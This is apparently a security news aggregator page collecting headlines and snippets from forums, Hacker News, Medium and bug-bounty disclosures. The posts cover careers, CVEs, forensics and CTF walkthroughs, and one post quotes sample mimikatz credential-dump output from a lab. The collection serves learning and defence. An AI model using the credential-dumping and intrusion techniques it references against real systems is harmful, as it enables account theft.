    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec!  ( 2 min )
  • Open

    Movies and series
    submitted by /u/omnifage [link] [comments]
    Dataset and model of the universe
    Gaia is a European space mission providing astrometry, photometry, and spectroscopy of more than 1000 million stars in the Milky Way. Also data for significant samples of extragalactic and Solar system objects is made available. The Gaia Archive contains deduced positions, parallaxes, proper motions, radial velocities, and brightnesses. Complementary information on multiplicity, photometric variability, and astrophysical parameters is provided for a large fraction of sources. http://cdn.gea.esac.esa.int/ Browse to https://gea.esac.esa.int/ for info. submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    Paranoids’ Vulnerability Research: PrinterLogic Issues Security Alert
    Article URL: https://www.yahooinc.com/paranoids/paranoids-vulnerability-research-printerlogic-issues-security-alert/ Comments URL: https://news.ycombinator.com/item?id=30060422 Points: 2 # Comments: 0  ( 8 min )
    F5 fixes high-risk Nginx Controller vulnerability in January patch rollout
    Article URL: https://portswigger.net/daily-swig/f5-fixes-high-risk-nginx-controller-vulnerability-in-january-patch-rollout Comments URL: https://news.ycombinator.com/item?id=30060420 Points: 2 # Comments: 0  ( 3 min )
  • Open

    SecWiki News 2022-01-24 Review
    初探node.js相关之原型链污染 by ourren 2021攻击技术发展趋势报告 by ourren SecWiki周刊(第412期) by ourren 内网代理工具与检测方法研究 by xiahao90 狩猎样本的哈希游戏 by Avenger 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Exfiltration
    I'd like to start a brief discussion that might be a great learning opportunity for a lot of newbie forensic investigators - From a forensics standpoint, how would you tell if a file was exfiltrated? For this scenario, I'm thinking ransomware gang exfiltrates data before encrypting and is using a cloud based solution for storage. submitted by /u/DeadBirdRugby [link] [comments]  ( 3 min )
    Does anyone have experience with /media/0/.RecycleBin? (Android)
    If a file has a creation time and has this location, does this mean the creation time is the time the file was put there? And therefore "deleted"? submitted by /u/DHZX [link] [comments]  ( 1 min )
    Cobalt Strike, a Defender’s Guide – Part 2
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

    安全分析技术的“前世今生”
    过去十年中,安全分析这项技术发生了怎样的变化?本文将和大家一起探讨安全分析的演变和价值。  ( 1 min )
    数千工业组织的企业电子邮件账户失窃,被滥用进行下一次攻击
    攻击者滥用企业邮箱的联系人信任发起攻击,从一个工业企业传播到另一个工业企业。  ( 1 min )
    在公司里他们只想低调,但是实力不允许
    斗象科技首届内部攻防演练圆满结束。
    斗象科技荣膺2021年网络安全优秀企业“安全服务十强”
    成功入选并荣获“安全服务十强”称号
    《2021年全国移动应用安全观测报告》
    当前,我国网络安全形势依然严峻,在大数据时代下,网络安全存在着病毒威胁、网络诈骗、黑客入侵、信息丢失等各种安全隐患。  ( 1 min )
    《2021业务风控洞察报告》正式发布
    从业务安全、内容安全、跨境安全三个维度对2021年典型欺诈场景和案例进行了深入剖析。
    FreeBuf早报 | 俄罗斯央行建议禁止加密货币;黑客将恶意程序植入到 UEFI 固件中
    一项新调查显示,过去三年中,针对世界各地公司的网络攻击数量增加了 15%。  ( 1 min )
    从重大漏洞应急看云原生架构下的安全建设与安全运营(上)
    重大漏洞的应急响应总结与安全运营驱动的安全能力建设  ( 1 min )
    浅谈PHP伪协议
    php中有很多封装协议,最常见的如file协议,php协议,data协议,zip和phar协议等等。  ( 1 min )
  • Open

    Forge HackTheBox Walkthrough
    Introduction Forge is a CTF Linux box rated “medium” on the difficulty scale on the HackTheBox platform. The box covers subdomain enumeration, SSRF attacks and The post Forge HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    No length on password
    Imgur disclosed a bug submitted by blackfly_: https://hackerone.com/reports/1411363 - Bounty: $250

  • Open

    mimikatz LogonPasswords and usernames with dollar sign ($) at the end
    I have a lab that I'm testing mimikatz on. Some of the usernames are dumped as "hostname$" What does that mean? hostname being the actual host name of the test server being in this case "labserver"; so it will be something like: [...] kerberos : * Username : labserver$ * Domain : lab.corp * Password : P@ssW0rd!! submitted by /u/ak_z [link] [comments]  ( 1 min )
    [Malware] I've started studying malware and more specifically backdoors, but something seems to not make any sense.
    Hey, i've recently started to study how backdoors work and are used / made. But i've noticed that every backdoor i've come accross follows this principle : A client runs on the target and tries to connect to the attacker to give him access. The server runs on the attacker and waits for a connection from the target. Shouldn't this be the opposite so the attacker can gain access whenever he wants ? Isn't the purpose of a backdoor to be an easy for the attacker to come back later? If so doesn't it defeat it ? Am i misunderstanding something ? I hope someone can help me clarify this. PS : I'm not asking this to commit any sort of crime, i'm genuinely interested in cybersecurity research and thats why i'm asking this question. submitted by /u/fleurdelys- [link] [comments]  ( 2 min )
    Which do you think is the higher tier in cyber security?
    Soc analyst or security analyst? submitted by /u/lowkiwatchingyou [link] [comments]  ( 1 min )
    Weak password found on "accident"
    Backstory for question: I'm currently on the process of getting a job and I was sent a link (via email) to a psychological test which required a username and password to login, the user was already typed for me (sent as parameter on the url) and the password was sent on the email. At first I didn't read the full email so I entered the link and when I saw I needed a password, I thought that there must've been a mistake, so I typed a "random" password to see what would happen (I typed the same user as the pass) and I was able to log in. I was very confused as I was greeted with a page full of information regarding the account I was logged in to and as I explored further I was able to see personal information regarding other people that have done the quiz. At this point I realized that I wasn't supposed to be able to read this info so I logged out and tried another password (I was thinking that maybe the account accepted everything you typed) but no, I got a "wrong password" text. I read the email again, this time I saw that the password I was supposed to use was always there, I try it and I log in succesfully, but now it doesn't redirect me to the admin panel, it takes me to the psych test I'm supposed to be doing. As a NetSec Student, I know that I should let the company know about this weak password, but I don't know how to do it without it looking like I was on purpose trying to log in with another password different than the one provided via email and maybe get in trouble with the company I'm applying to. Worded as a question: What is the best way to let a company know that they have a vulnerability on an account? TL;DR: Got sent user and pass for an account, tried same user as pass instead (because I'm dumb and didn't read full email) and logged in as admin. Want to disclose this to the company but don't want to get in trouble. submitted by /u/Emacholo [link] [comments]  ( 3 min )
    Advice on a DAST Tool to Handle Single Page Apps
    Hi everyone, I’m currently looking for a DAST scanner that works well with single page applications (I’m using Ember.js with a couple of APIs behind it). For example, every tool I’ve tried has not been able to effectively test for XSS, as they can’t link injection points from API calls back to the rendered DOM on the monolithic front end. Any tools, advice, etc. would be so greatly appreciated. Also, please note that I already utilize SCA and SAST, and will be moving to IAST in the future – this is solely about DAST. Cost is not a concern, just effectiveness. submitted by /u/shadowcorp [link] [comments]  ( 1 min )
    Jumping from Application Developer/DevOps to Application Security Engineer
    Hey everyone, I'm 27, relatively new into tech (4 yesrs of experience). I'm a full stack developer, experienced with DevOps and CI/CD pipelines, and I have a CISSP. My goal is to ultimately become a jack of all trades architect. I'm potentially getting an opportunity to move into an application security engineering role that has significantly less development, and a lot more threst modeling, security architecture, pen testing, etc. I've never done those things, I've only studied them. Is it worth it to switch into a much more high level security oriented position? Would I be abandoning my primary skill set? Or is there a way to combine the 2 down the line? I'd love to hear your experience, your advice, and how your own career grew. submitted by /u/pyscho94 [link] [comments]  ( 1 min )
    Strange unknown local device found when running Wireshark and filtering via ARP
    Hi, I apologize in advance if this does not fit this subreddit. I was running wireshark on my home network and was filtering by ARP to test some things. But in the process I found a strange device with a Facebook mac adress. https://imgur.com/a/HbNuWdE (note, I removed the mac for the router) It was only the router asking for ip and not vice verca. Why would the router ask for it in the first place? Any info/explination would be appreciated. submitted by /u/Wattcat [link] [comments]  ( 1 min )
    Career pivot!
    Looking to pivot the the cyber security world. Studying for a sec + cert, have a secret clearance, and got a cyber cert from MIT. Have 2 years of DOD consulting experience. And an engineering degree. Looking at roles like “cybersecurity engineer” and cybersecurity analyst What kind of compensation can I expect as a government contractor with the above resume? I’m looking to get into the RMF/Policy/Vulnerability Assessment world. I am trying to create a future path for myself down the road. submitted by /u/tbrady1001 [link] [comments]  ( 1 min )
    Making the jump from IT Support to Security - Advice needed
    Hello, Looking to move into IT Security from IT Support. I currently have 15+ years in IT Support (1st, 2nd, 3rd line IT support). Unfortunately I'm pretty clueless on progression steps and the certs needed to climb up the Security ladder. I don't like the idea of CISSP as that appears to be geared towards management, but like the look of Security Analysis/Defensive/Offensive. With my IT background what certs should I look at? I was thinking GCIH as a start? Also would 2 years as a Security Analyst with a couple of certs be enough to progress in a new company? Or would 5 years (for example) be the minimum I would realistically need? Any advice/insight would be appreciated and apologies if this is the wrong forum. submitted by /u/ZoidbergsMinions [link] [comments]  ( 5 min )
    Security for Personal IT Tutor
    Hi, I’m getting increasing requests from friends of friends of family to do some basic IT support work for them. With close family members I have been entrusted with access to their password managers and unattended remote access, which is really useful to be able to help with things they can’t do themselves or when they’re away from their devices - all the credentials for this are kept in a totally separate password manager from my personal accounts. However I recognise that this is big security risk, and if I’m going to be working with people outside my family, I want to avoid exposing them to unnecessary risk without severely limiting my ability to help them. What should I be conscious of in setting up a remote access solution for this purpose? Are there any good ways that clients can share passwords or access to specific accounts without me having access to their entire password manager? submitted by /u/marquitanavin [link] [comments]  ( 1 min )
    Temporal Scoring - CVSS How to Input
    So right now I am using CVSS v3.0 base scoring to calculate severity of a findings from scanning tools like Tenable.sc, snyk, and some other tools. I want to go farther and factor the CVSS Temporal score into the severity so I can prioritize better... question is how do I do that when I have 1,000+ findings and can't do it manually? Where can I get a feed or service or point in time data to get that? NVD does not provide it. ​ Thank you! submitted by /u/ThrowThrowAway789 [link] [comments]  ( 1 min )
  • Open

    A new shellcode injection methodology
    submitted by /u/Idov31 [link] [comments]
    Binary-only fuzzong with python, Qemu and LibAFL
    submitted by /u/domenukk [link] [comments]
    Doing a uni project on pen testing and appreciated this article for help writing up an information disclosure vulnerability. Though some of you might appreciate it too.
    submitted by /u/PlatonicDogLover93 [link] [comments]  ( 1 min )
    Backdoor Found in Themes and Plugins from AccessPress Themes (CVE-2021-24867)
    submitted by /u/ScottContini [link] [comments]
  • Open

    The Threat Landscape and Attribution
    Over the years, changes in the threat landscape have made attribution more difficult. Attribution has always been challenging, but has been and can continue to be eased through visibility. That is, if your view into an event or campaign is limited to resources such as malware samples pulled from public repositories, then attribution can be challenging. Even adding information regarding infrastructure extracted from the sample configs can still give a somewhat limited view. However, as visibility is expanded to include data from intrusions and incidents, attribution becomes clearer and more granular. I ran across A Complex Threat Landscape Muddles Attribution recently and found it to be a fascinating, insightful read, one that anyone involved in threat intelligence, even peripherally, shoul…  ( 8 min )
  • Open

    Wildfire videos - wireless research UCSD
    The High Performance Wireless Research and Education Network (HPWREN), a University of California San Diego partnership project led by the San Diego Supercomputer Center and the Scripps Institution of Oceanography's Institute of Geophysics and Planetary Physics, supports Internet-data applications in the research, education, and public safety realms. HPWREN functions as a collaborative, Internet-connected cyberinfrastructure. The project supports a high-bandwidth wireless backbone and access data network in San Diego, Riverside, and Imperial counties in areas that are typically not well-served by other technologies to reach the Internet. This includes backbone locations, typically sited on mountain tops, to connect often hard-to-reach areas in the remote Southern California back country. http://hpwren.ucsd.edu/HWB/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    Indiana Department of Homeland Security Fire Regulation Variance Requests
    submitted by /u/Typographical_Terror [link] [comments]  ( 1 min )
    Books on Theorists of Education [PT-BR]
    submitted by /u/afmachado [link] [comments]
  • Open

    Tracing Tor router connections within a host
    Hi there, I'm analysing a memory dump from an infected system that is running a cryptominer and connecting to the mining server through a Tor router. I know the processes of the miner and the tor router it installed on the system. Is there a way to show the miner handing over the IP of the actual mininf server to the Tor router? The firewall of course just sees the connection to the next Tor router. submitted by /u/NazgulNr5 [link] [comments]  ( 1 min )
    What are some jobs that you can do with experience in computer forensics?
    I have a very close friend who has been doing computer forensics for well over 10 years and has experience with networking technology too. They've been working for local law enforcement all this time and has had to deal with "very bad sexual content" for quite a long time and it's really starting to eat away at their mental health. They really would like a job change. They are willing to work in law enforcement as long as the work doesn't involve kids. They make good money at the police department they work at now so a part of the equation is a paycheck. They are hoping to work at this job for the rest of their career. Teaching would also be an option. Thanks for any answers. submitted by /u/Onece_in_a_life_time [link] [comments]  ( 3 min )
  • Open

    Process Ghosting Attack
    Introduction Gabriel Landau released a post on Elastic Security here which talks about a technique through which antivirus evasion was found to be possible. The The post Process Ghosting Attack appeared first on Hacking Articles.  ( 8 min )
    Corrosion: 2 VulnHub Walkthrough
    Proxy Programmer’s Corrosion: 2 is a Vulnhub medium machine. We can download the lab from here. This lab is designed for experienced CTF players who The post Corrosion: 2 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
    Intelligence HacktheBox Walkthrough
    Introduction Intelligence is a CTF Windows box with difficulty rated as “medium” on the HackTheBox platform. The machine covers OSINT, AD attacks, and silver ticket The post Intelligence HacktheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    My Pentest Log -4-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Creating easy proof-of-concept scripts with Python and Curl.
    Hello Hunters! Continue reading on Medium »  ( 3 min )
    PORTSWIGGER WEB SECURITY - XSS (CROSS SITE SCRIPTING) LAB ÇÖZÜMLERİ
    Cross Site Scripting (Siteler Arası Komut Dosyası Çalıştırma), saldırganın bir web uygulamasında çalıştırdığı zararlı komutlar sonucunda… Continue reading on Medium »  ( 32 min )
    Fuzzing is always fun..!!
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    Setting up a Free VPS for Bug Bounty & More
    Finding Bugs can be Time consuming and as for day-to-day life, you are not sitting on your one computer all day unless you are a… Continue reading on Medium »  ( 3 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability just from reconnaissance. Found multiple vulnerabilities on a web application that used the Symfony web… Continue reading on Medium »  ( 2 min )
  • Open

    Show HN: TypeScript Scenario-Based Web Application Fuzzing Framework
    Article URL: https://github.com/shfz/shfz Comments URL: https://news.ycombinator.com/item?id=30047196 Points: 1 # Comments: 0  ( 4 min )
  • Open

    SecWiki News 2022-01-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    你家的wifi安全么?
    你家的Wifi安全么,有没有可能被别人蹭网,或者被黑客登录进来,窃取数据?  ( 1 min )
    域内常用的操作精简版
    当我们渗透进了内网当中,我们需要快速确定我们自身所处的环境,以及我们需要确定接下来该如何行动。这篇文章非常精简的介绍了这些操作  ( 1 min )
  • Open

    Intigriti’s January XSS challenge By TheRealBrenu
    First challenge for 2022 is here by TheRealBrenu. This one is a good example of javascript source maps, which I was unfamiliar at first… Continue reading on Medium »  ( 3 min )
  • Open

    OSINT Double Trouble
    It’s a new year, and that means new OSINT Challenges to solve. This time around, I’ll be solving 2 challenges courtesy of Twitter’s… Continue reading on Medium »  ( 4 min )

  • Open

    I'm working in security and stuck on whether I should learn Web Development
    Hi Everyone, I currently work in Cyber security (Cryptography specialist) for a large organization. However, I have minimal coding experience. I would like to start the Odin Project but I'm not sure if I should invest all that time in learning web dev or continuing a path in security with something like a CISSP for more security knowledge. The odin project inspired me because I want to create custom blogs/websites of my own at some point but I do know it might halt my security knowledge progression and I know I can't balance learning both right now. Will having both skills be better than just having one? If anyone has another suggestion that would be better I am open to that as well. The odin project inspired me because I want to create custom blogs/websites of my own at some point but I do know I have a lot to learn in either path I choose. Thank you in advance. submitted by /u/Early_Ad_1861 [link] [comments]  ( 3 min )
    Backdoor payloads in image files: is this a thing?
    If I open an image in gmail (I think it opens through their viewer), can the payload run? Should I be concerned? Is just viewing it sufficient or would I have to download it? submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
    Does anyone know what these photos/files are from the Brave browser folder?
    There were also some manifest.json's that had information like ""name":"Brave NTP sponsored images"", "Brave NTP sponsored images", "Tezos", "Taxbit" in them. Are these preloaded files for ads for a cryptocurrency/NFT manager that's placed somewhere in Brave intentionally? They were listed in a folder that looked like gibberish: "ghjifhoinncdowgrhioybqpasjndavbaoba" as an example. https://imgur.com/a/zozye1B I don't have to worry about some kind of "secret" cryptominer like Norton recently added to their software right? (I hope that this is the case and it's just files for ads). submitted by /u/nekohideyoshi [link] [comments]  ( 1 min )
    ISO 27001 Lead Auditor Certification
    Hey everyone. So I’m planning on doing the ISO 27001 LA certificate and came across it being offered by multiple certification body such as TUV, BSI and PECB. Can anyone tell me what the difference is between the certification bodies as I see a drastic price difference. Thanks in advance. submitted by /u/reeds1164 [link] [comments]  ( 1 min )
    What is the best entry level Linux certification?
    Hey everyone! Thank you for stopping by my post. I was wondering what is the best entry level Linux certification. I understand that the Linux + and Lpic-1 are no longer are a 1 for 2 package. Then everything I read online says don’t go for either of these and look into getting a red hat certification. I am going down the security engineer road and just need to get much deeper into Linux than I currently am. What are your recommendations and thoughts on Linux certifications? submitted by /u/RedNeckHutch [link] [comments]  ( 3 min )
    What can work computers/IT have access to?
    Assume you have a work laptop given to you with a remote software that’s installed to give IT monitoring and troubleshooting access. What are some best practices for separating your work and personal stuff when using the work laptop? Should you avoid logging into things like your personal google account, Bank accounts, etc? Does this make it possible for someone in IT possibly with bad intent to also have access to your other devices in your network? If so, best practices to avoid such breaches? I assume you never want to login into your other computers shared drives from your work computer which will give access to every file on your personal computer that’s shared. I’m curious what is the extent of monitoring that a normal corporate workplace does on the computer? I always assumed they can see my screen at any time, all key strokes are logged. But this makes me uncomfortable in the event that there’s a breach, hack, or bad employee who can cause lots of damage. Thoughts on this matter? Anyone familiar with kaseya software for monitoring? submitted by /u/RasAlTimmeh [link] [comments]  ( 1 min )
  • Open

    Beginner Bug Bounty Guide - Part 2
    Previous: Beginner Bug Bounty Guide - Part 1 Continue reading on Medium »  ( 1 min )
    Bug Fix Update: TribeOne dApp is Ready to Take NFT Space by Storm
    Our dApp is getting closer and closer to perfection as we work hard to achieve the best possible user experience. Continue reading on Medium »  ( 2 min )
    Kenobi Walkthrough | TryHackMe | Explained | Part 1
    Goals: Enumerate Samba for shares, manipulate a vulnerable version of proftpd Continue reading on Medium »  ( 3 min )
    Malicious file upload leads to off-domain XSS
    Hello Everyone, Continue reading on Medium »  ( 1 min )
    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the… Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    GoWard - A robust Red Team proxy written in Go
    submitted by /u/UnwearableCactus [link] [comments]
    CVE-2021-45467: CWP CentOS Web Panel – preauth RCE
    submitted by /u/Gallus [link] [comments]
  • Open

    Case in modern communist destabilization of Ukrainian-Poland relations
    Case provides overview of 5 year long activity of former Ukrainian citizen in Poland, conducting provocations and communist propaganda in… Continue reading on Medium »  ( 13 min )
    Quiztime — Random OSINT Challenge 5
    On Jan 14, 2022, Quiztime (contributor @dondude) shared a new OSINT quiz with us. The objective was fairly simple. We had to figure out… Continue reading on Medium »  ( 3 min )
    OSINT Challenge — On the road to Estonia
    In December 2021 the OSINT Dojo invited the community to solve a traditional image-based geolocation OSINT challenge. They have asked for… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-01-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Buffer Overflow in optimized_escape_html method
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1455248 - Bounty: $1200
    xss reflected on imgur.com
    Imgur disclosed a bug submitted by whoami991: https://hackerone.com/reports/1058427 - Bounty: $100
  • Open

    Android Pentesting-Intents
    When doing a black box pentesting for android , apart for looking at root detection bypass and ssl pinning looking for intents are also… Continue reading on Medium »  ( 2 min )
  • Open

    A collection of 8mm family videos from the 60's that have been digitized and restored
    submitted by /u/HGMIV926 [link] [comments]  ( 3 min )
  • Open

    OSS authors:“We need to understand your mitigation plans for this vulnerability”
    Article URL: https://twitter.com/bagder/status/1484672924036616195 Comments URL: https://news.ycombinator.com/item?id=30035651 Points: 68 # Comments: 11  ( 1 min )
    CVE-2022-0185: Detecting Linux Kernel vulnerability causing container escape
    Article URL: https://sysdig.com/blog/cve-2022-0185-container-escape/ Comments URL: https://news.ycombinator.com/item?id=30034914 Points: 18 # Comments: 0  ( 5 min )
  • Open

    CVE-2021-45467: CWP CentOS Web Panel – Preauth RCE
    Article URL: https://octagon.net/blog/2022/01/22/cve-2021-45467-cwp-centos-web-panel-preauth-rce/ Comments URL: https://news.ycombinator.com/item?id=30035247 Points: 1 # Comments: 0  ( 3 min )
    CVE-2022-0185: Detecting Linux Kernel vulnerability causing container escape
    Article URL: https://sysdig.com/blog/cve-2022-0185-container-escape/ Comments URL: https://news.ycombinator.com/item?id=30034914 Points: 18 # Comments: 0  ( 5 min )
  • Open

    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the…  ( 6 min )
  • Open

    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the…  ( 6 min )
  • Open

    Employee Access to Data
    This is largely for those who work in, have worked in, or have worked with a SOC. For this example, there is a SOC that has tiers of analysts, with lower level analysts performing basic tasks and escalating alerts to the upper level analysts. The lower level analysts serve more of a traffic cop type of role; they weed out the easily spotted false-positives and may start very basic reviews of true positive events before handing off to the higher level analysts for analysis. In this setup, all members of the SOC have full access to M365 (all mailboxes, all OneDrives). This is in addition to the ability to triage machines via an EDR tool and collect files through that tool. My question: is that type of access appropriate for the lower level analysts? The obvious concern is that it is excessive data for the role they are performing (including any especially since the position has fairly high turnover. What are your thoughts? submitted by /u/ebarboza311 [link] [comments]  ( 2 min )
    digital forensics software bypass encryption
    How does forenics software extract files from password protected iphones? submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    Old iphone se
    I have an old iphone se i rhink. Somebody tried logging in buch of times and locked out forever basically. So i connected to itunes and it told me to update it so i did just in case it gives me a chance to try again and now it says phone unavailable. And not lock screen. So am i screwed because its extremely important to get the videos and photos from there. submitted by /u/TushieandTush [link] [comments]  ( 1 min )

  • Open

    CVE-2022-0185: Detecting and mitigating Linux Kernel vulnerability causing container escape
    submitted by /u/MiguelHzBz [link] [comments]
    The best free, open-source supply-chain security tool? The lockfile
    submitted by /u/pabloest [link] [comments]  ( 1 min )
    Captain Hook - How (not) to look for vulnerabilities in Java applications
    submitted by /u/Gallus [link] [comments]
  • Open

    I need an advice
    Hi, I can choose among 3 internships as a computer science student. I really want to land a job in cybersecurity but right now I need to build up my CV and finish my degree. The 3 internships are: Automation Software Engineer (you have to validate portions of software implementations for Communication Service Providers based on established engineering principles and in accordance with provided specifications and requirements, help evolving our telecommunication focused product, build demonstrations of product use cases help to prepare collaterals to explain technical product capabilities, software architectures and features, build automated test scripts to analyse test data to verify requirements compliance) Internship Program for Information Science or Telco Engineer (you have to participate to a project delivery for assigned tasks, that may include performing analysis and design of a IT or Telco Solution, SW Development, systems configurations, troubleshooting systems errors/problems, monitoring and/or testing systems performance, and contribute to the design of technical solutions for customer environments, work under supervision of technical lead and with customer nominated representatives to accomplish assigned tasks) Automated Assurance Artificial Intelligence & Machine Learning Engineer (validate portions of software implementations for Communication Service Providers based on established engineering principles and in accordance with provided specifications and requirements, develop and extend the coverage of current test automation, build automated test scripts to analyse test data to verify requirements compliance, work on small independent software and system integration projects to augment internal work). As you can see they are intertwined, but I would guess the 2nd one could be more cybersec-oriented (for the telco part). What do you think? Any advice is appreciated. submitted by /u/Danyderossi [link] [comments]  ( 2 min )
    Switching From IT Audit
    Hello, I work in IT audit and I would like to have a more operational/hands-on role within an IT department. The problem is that I don't have any experience dealing directly with IT work. How would you recommend I go about transitioning from IT audit to a more technical role? Any certifications or skillsets I you would recommend I obtain? I was thinking IT Security would probably be the best fit, given most of my audits are involved with IT security, patch management, or mobile device security. submitted by /u/DapperDandy22 [link] [comments]  ( 1 min )
    Payloads in Word/PDF documents: Is this still a thing?
    I read about this being used to hack computers recently. Are most computers still vulnerable to this? Payload=malicious file that could potentially create a backdoor that runs in the document when you enable macros (most people are not cognizant of this possibility). An article I read tested this successfully on a Windows machine running Outlook that defaulted to Adobe to read the PDF. I noticed in GMail that docs and PDFs aren't opened on the computer, but read in a window. Does this prevent payload execution? Anyways, I'd like to know if this is still a thing and why? Why can't Adobe or Microsoft build their applications to not allow this? submitted by /u/anon314159265358p [link] [comments]  ( 3 min )
    Red team Operator to security strategy consultant
    Hi all, I am currently working for a big four firm(US) as a red team member. I am thinking to switch to the broader sense of security to see more parts such as security stragegy/security officer/architect roles Many people see red teaming as the most fun job & I agree it is awesome. However, Red team is only smart part of the equation. Who has made the leap and switched to a strategy role as a pentester/red team? What was your experience in the new role? submitted by /u/TechnicalCiso [link] [comments]  ( 2 min )
    Taking on new role as Security Architect. Advice? Tips? Considerations? Anything welcome!
    As the title states, taking on a new role as a Security Architect for a predominantly Windows hybrid cloud/on-prem environment that hosts quite a few web servers. I am very comfortable with the deployment and configuration of hardened endpoints, SIEMs (Splunk & ELK), network segregation, backup and restoration, and authoring most relevant policy and procedure as it relates to NIST 800-53. My understanding is that I am one of 2 "cybersecurity" specialists and will be responsible for documenting, developing, and configuring the entire security architecture from the ground up. I've been told that MFA has been enforced at 100% compliance. I am not however familiar with securing a hybrid environment, and don't have a ton of experience managing firewalls. How should I approach the discovery/recon aspect of becoming familiar with a new network? After getting my bearings and a detailed depiction of the current architecture, I plan to first tackle the backup and restoration processes to ensure ransomware resistance. Then address any glaring weak points. Anything to help a brother out? submitted by /u/UnderZinfluence [link] [comments]  ( 4 min )
    likelyhood of embedding malicous code in music streaming services?
    to the Red Teamers: imagine this, i use a music streaming service, i have som playlists that me and my friends colloaborate on, this playlist have enabled "automatic download" so whenever a track is added it is also automaticly downloaded to my device. now take this further, you embed malicious code to tracks, and upload them to the music service, and then my friend add this track with malicious code to the playlist, and bam! i got the file on my systems. now add the fact that when you open af playlist to collaboration, it opens this playlist for everyone to add tracks. sure to hack the major providers of this service is going to be hard, but the small band/label/producer that uploads the tracks to the service, classic supply chain. and the bad actor can just browse around for open playlists and add these "bad" tracks and now you got the file to the device. so to what degree is this a like attack vector? is it at all feasable? because you got plenty versions for different OS with likely exploits available. i atleast was quite surprised to find a playlist of mine, with alot of new music i didnt recognize for a user i had not shared my playlist with. and was sitting at work and thought, "this is most likly an overlooked tool to use" so should one be worried about these "auto sync/download" a bit like dropbox, but here it is open to everyone/the world. atleast i block the unsanctioned cloud storage services, while permitting the web part at work, so when you download stuff via web its scanned and checked by our EDR, where i worry about the app's with auto sync and all that. so should i block spotify, tidal, soundcloud [insert service here] apps aswell? submitted by /u/Uli-Kunkel [link] [comments]  ( 3 min )
    Startup Asking for SSN in a Google Form
    I worked for a small startup during the summer of 2021. There were several things that came up during the internship that made me feel the company was not one that I would stand behind, and they didn't know what they were doing. They paid me hourly, but they never set up an employment contract that they promised. They never collected my tax info. Suddenly, within the last two days they have sent me several messages asking me to fill out a Google Form so they can complete the 1099's. The form is just straight up all the most sensitive information: full legal name, address, email & phone, SSN. (1) I'm not sure how secure it would be to send an SSN over a Google form, so I haven't done it yet. (2) I know that the form will result in a Google sheets that has all of the employees info, and I'm not sure if the company will keep that secure or delete it, but it weirds me out thinking that there might indefinitely be a Google form out there with my SNN other personal info, and they'll forget about it when the company inevitably goes defunct. (3) I'm not sure what other secure method I can suggest, to get them this information so they can send the 1099. submitted by /u/ImpressiveAirport4 [link] [comments]  ( 2 min )
    Anyone surprised about the lack of fundamental knowledge in network security? Not enough forward engineering knowledge it seems.
    There seems to be a surprising lack of fundamental knowledge in network security. Has anyone else felt the same? Here are some examples working with different teams: Work heavily with Kibana servers, but lacked fundamental database knowledge You would think someone managing a clusters would at least understand the basics of distributed systems Heavily use SIEMs, but could not tell you what a the concept of an operating system process beyond "Yeah, it's a program that executes." A serious lack of web development knowledge A lot of people entering the field claiming they are knowledgeable in network security, but can't forward engineer a basic CRUD app, and yet they'll claim they know how to reverse engineer it and secure it. Yeah, you're able to successfully complete a basic SQL injection hackthebox, but you could barely construct a SQL query yourself. You just blindly put in a SQL query and hope you get back an error saying the web application is vulnerable and then blindly put in another SQL query. submitted by /u/me_hungry_and_sad [link] [comments]  ( 4 min )
  • Open

    Cyber Investigator OSINT CTF “Cyber Crime” Writeup
    The Cyber Society at Cardiff University runs the Cyber Investigator CTF, a free CTF with OSINT and forensics challenges. Continue reading on Medium »  ( 4 min )
    First Blog…
    This is my first ever blog. Blogging is not something I ever thought i’d end up doing, but to obtain #OSINTDojo ranks & badges there are… Continue reading on Medium »  ( 6 min )
    Срочно! Поляки угрожают известному журналисту Игорю Исаеву!
    Известному запорожскому журналисту Игорю Исаеву в Польше грозят 3 годами тюрьмы. Кто это сделал? Continue reading on Medium »  ( 10 min )
    Windows Shell — Discovery Stage
    Sometimes you don’t always need a Meterpreter shell. Depending on the intent, Netcat might be all you need. The benefit being that Windows… Continue reading on Medium »  ( 5 min )
    Using Open Source Intelligence (OSINT)
    Recently, Netflix’s ‘The Great Hack’ has sparked a lot of interest around data privacy. The documentary covers Cambridge Analytica and how… Continue reading on Medium »  ( 7 min )
  • Open

    hosted.weblate.org display of unfiltered results
    Weblate disclosed a bug submitted by joshmcman08: https://hackerone.com/reports/1454552
    Email change or personal data change on the account.
    Stripe disclosed a bug submitted by dk82hg: https://hackerone.com/reports/1250037 - Bounty: $3000
    [https://app.recordedfuture.com] - Reflected XSS via username parameter
    Recorded Future disclosed a bug submitted by bombon: https://hackerone.com/reports/1201134 - Bounty: $300
    disclosing clients' secret keys https://stage-uapi.tochka.com:2000/
    QIWI disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1419205 - Bounty: $150
  • Open

    Duplicating USB drives
